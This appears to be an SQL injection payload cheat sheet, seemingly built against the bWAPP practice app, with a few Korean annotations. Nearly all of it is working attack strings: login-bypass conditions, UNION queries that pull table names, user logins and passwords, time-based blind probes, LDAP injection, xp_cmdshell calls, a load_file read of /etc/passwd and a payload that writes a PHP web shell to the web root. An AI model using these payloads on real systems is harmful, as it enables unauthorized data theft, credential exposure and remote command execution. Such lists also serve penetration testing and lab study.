sql_cheat_attack.txt

'
"
#
-
--
'%20--
--';
'%20;
=%20'
=%20;
=%20--
\x23
\x27
\x3D%20\x3B'
\x3D%20\x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or%20select *
admin'--
<>"'%;)(&+
'%20or%20''='
'%20or%20'x'='x
"%20or%20"x"="x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
"' or 1 --'"
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
' and 1=1
' or sleep(@1) and 1=1#
@1 = {1,2,3,4,5,6,7,8,9,10 }
' or sleep(@1)# 
	@1 = {1,2,3,4,5,6,7,8,9,10}
admin' and sleep(@1)#
	@1 = {1,2,3,4,5,6,7,8,9,10}

' union select sleep(2),null,null,null,null,null,null#
' union select null,sleep(@1),null,null,null,null,null#
' union select null,null,sleep(@1),null,null,null,null#
' union select null,null,null,sleep(@1),null,null,null#
' union select null,null,null,null,sleep(@1),null,null#
	@1 = {1,2,3,4,5,6,7,8,9,10}


@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
&lt;&gt;&quot;'%;)(&amp;+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*




'.)))("),.

'ghwshP<'">CZuifw

)+AND+4287=8913+AND+(7303=7303

)+AND+8680=8680+AND+(6351=6351

+AND+4573=5119

+AND+8680=8680

')+AND+9284=3986+AND+('ndfW'='ndfW

')+AND+8680=8680+AND+('juwu'='juwu

+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(102)||CHR(111)||CHR(77),5)

')+AND+2138=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(102)||CHR(111)||CHR(77),5)+AND+('VIDM'='VIDM

(SELECT+3273+FROM(SELECT+COUNT(*),CONCAT(0x716a6a7671,(SELECT+(ELT(3273=3273,1))),0x716b717071,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)

(SELECT+CONCAT(0x716a6a7671,(SELECT+(ELT(6967=6967,1))),0x716b717071))

+AND+4920=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(106)||CHR(118)||CHR(113)||(SELECT+(CASE+WHEN+(4920=4920)+THEN+1+ELSE+0+END)+FROM+DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(112)||CHR(113)||CHR(62)))+FROM+DUAL)

)+AND+7244=4397+AND+(3968=3968

)+AND+6379=6379+AND+(1483=1483

')+AND+2572=3816+AND+('alWa'='alWa

')+AND+6379=6379+AND+('mxeB'='mxeB

)+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+tsVj

+ORDER+BY+1--+UCdp

+UNION+ALL+SELECT+NULL--+UzBg

+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+ISdf

')+ORDER+BY+8048--+qQkS

')+UNION+ALL+SELECT+NULL--+TFas

')+UNION+ALL+SELECT+NULL,NULL--+EZcP

%'+ORDER+BY+1--+NSgg

%'+ORDER+BY+7605--+dZkK

%'+UNION+ALL+SELECT+NULL--+JQPp

%'+UNION+ALL+SELECT+NULL,NULL--+VtSC

+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+Lbrh

' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b6271,IFNULL(CAST(table_name AS CHAR),0x20),0x7162627671),NULL,NULL FROM INFORMATION_SCHEMA.TABLES-- sd 
' AND (select 1)=1 




' AND (select 1 from column_name limit 0,1)=1 
=> ' AND (select 1,@2,@3,@4,@5,6,7 from column_name limit 0,1)=1 
	database() : 데이터베이스 이름
	user() : 사용자 id
	system_user() : 관리자 권한 사용자 아이디
	table_name: 테이블 이름
	column_name: column이름
	concat(): 문자열을 합쳐서 출력
	@@version : SQL 버전
	@@datadir : SQL 서버 디렉토리
tableName[]={database,user,system_user,table_name,column_name,@@version,@@datadir}


' AND (select 1,@1,@2,@3,@4,6,7 from users limit 0,1)=1 
' AND (select 1,@1,3,4,5,6,7 from users limit 0,1)=1 
' AND (select substring(concat(1,id),1,1) from users limit 0,1)=1 
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 

' or 1=1 order by 7#

' or 1=0 union select null,null,null,null,null,null,null# 
' or 1=0 union select 1,2,3,4,5,6,7#
' or 1=1 union select null,table_name,null,null,null,null,null from information_schema.tables#
' or 1=0 union select null,table_schema,null,null,null,null,null from information_schema.columns#
' or 1=0 union select version(),null,null,null,null,null,null from information_schema.columns#
' or 1=0 union select @@version,null,null,null,null,null,null from information_schema.columns#
	=> ' or 1=0 union select null,@2,@3,@4,@5,null,null# 
	=> ' or 1=0 union select null,@2,@3,@4,@5,null,null from information_schema.tables #  


' or 1=0 union select substring(version(),1,1)=1,null,null,null,null,null,null from information_schema.columns# 
' or 1=0 union select substring(version(),1,1)=5,null,null,null,null,null,null from information_schema.columns# 
' or 1=0 union select substring(version(),3,1)=2,null,null,null,null,null,null from information_schema.columns# 
	=> ' or 1=0 union select substring(version(),@1,1)=@2,null,null,null,null,null,null from information_schema.columns# 

' or 1=0 union select 1,table_name,null,null,null,null,null from information_schema.columns#
' or 1=1 select null,table_name,null,null,null,null,null from information_schema.columns where table_schema='public'# 
' or 1=1 select null,column_name,,null,null,null,null,null from information_schema.columns where table_schema='public' and table_name='info'#
' or 1=1 select null,table_name as table,column_name as column,null, null, null, null, null from information_schema.columns#


' or 1=0 union select id,null,null,null,null,null,null from users# 
' or 1=0 union select id,name,null,null,null,null,null from users#
' or 1=0 union select id,name,null,null,null,null,null from users where id='@1'# 
' or 1=0 UniOn selEct id,null,null,null,null,null,null FroM users#

no=1 and 1=1#
' or 1=1#
' or 1=1 and sleep(@1)#
	=> @1 = {1,2,3,4,5,6,7}

' or sleep(@1)#
	=> @1 = {1,2,3,4,5,6,7}

' or ascii(substring((select table_name from information_schema.tables where table_type='base table' and table_schema='bWAPP' limit 0,1),1,1))<100 and sleep(1)#
	
=> ' or ascii(substring((select table_name from information_schema.tables where table_type='base table' and table_schema='bWAPP' limit 0,1),@1,1))<100 and sleep(@2)#
-- or #
=> @1 = {1,2,3,4,5,6,7
=> @2 = {1,2,3,4,5,6,7}

'''''''''''''UNION SELECT '2

AND true
1' ORDER BY 1--+
;waitfor delay '0:0:5'--
' or length(database())=1#
' or substring(database(),1,1)='b' and sleep(1)#
	=> ' or substring(database(),@1,1)='@2' and sleep(@3)#
	=> @1 = {1,2,3,4,5,6,7}
	=> @2 = {‘b’,’w’,’a’,’p’}
	=> @3 = {1,2,3,4,5,6,7}

' or 1=1 and substr((select tbl_name from sqlite_master limit 0,1),1,1)='b'--
	=> ' or 1=1 and substr((select tbl_name from sqlite_master limit 0,1),@1,1)='@2'--
	=> @1 = {1,2,3,4,5,6,7}
	=> @2 = {‘b’,’w’,’a’,’p’}

' unon select 1,2,3,4,5,6,7--
1',(select table_name from information_schema.tables limit 1,1))#
1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name="users"-- -
1 union all select 1,2,3,4,5,6,7#
0' union select all 1,password,login,3,4,5,6,7 from users#
0 union select 1,load_file("/etc/passwd"),3,4,5,6,7
0 union select 1,load_file("/etc/apache2/apache2/conf"),3,4,5,6,7
0 union select '<?system("$_GET['cmd']");?>'into outfile '/var/www/shell.php'
1 waitfor delay '0:0:10'--
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
asc
desc
delete
update
' or user like '%
' UNION ALL SELECT
' union select null,sleep(@1),null,null,null,null,null#
' union select null,null,sleep(@1),null,null,null,null#
' union select null,null,null,sleep(@1),null,null,null#
' union select null,null,null,null,sleep(@1),null,null#
	@1 = {1,2,3,4,5,6,7,8,9,10}
--
'%20--
--';
'%20;
=%20'
=%20;
=%20--
\x23
\x27
\x3D%20\x3B'
\x3D%20\x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or%20select *
admin'--
<>"'%;)(&+
'%20or%20''='
'%20or%20'x'='x
"%20or%20"x"="x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
"' or 1 --'"
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
1' ORDER BY 1--+
1' ORDER BY 1,2--+
1' GROUP BY 1,2,3--+
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
=> @1;waitfor delay '0:0:5'--
=> @1 = {NULL, ‘)’, ‘\’’,’\”’, ‘\’)’, ‘\”)’, ‘))’, ‘\’))’, ‘\”))’}
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
=> @1 or benchmark(10000000,MD5(1))#
	=> @1 = {1, ‘\”’, ‘\’’}
ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)




columnsName = {id, login, password, email, secret, activation_code, activated, reset_code, admin, uid, name, pass, mail, theme, signature, signature_format, created, access, status, timezone, language, picture, init, data}

TableName = { COLUMNS, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS	
TABLES, USER_PRIVILEGES, VIEWS,  users, blocked_ips, cache, file_usage, user}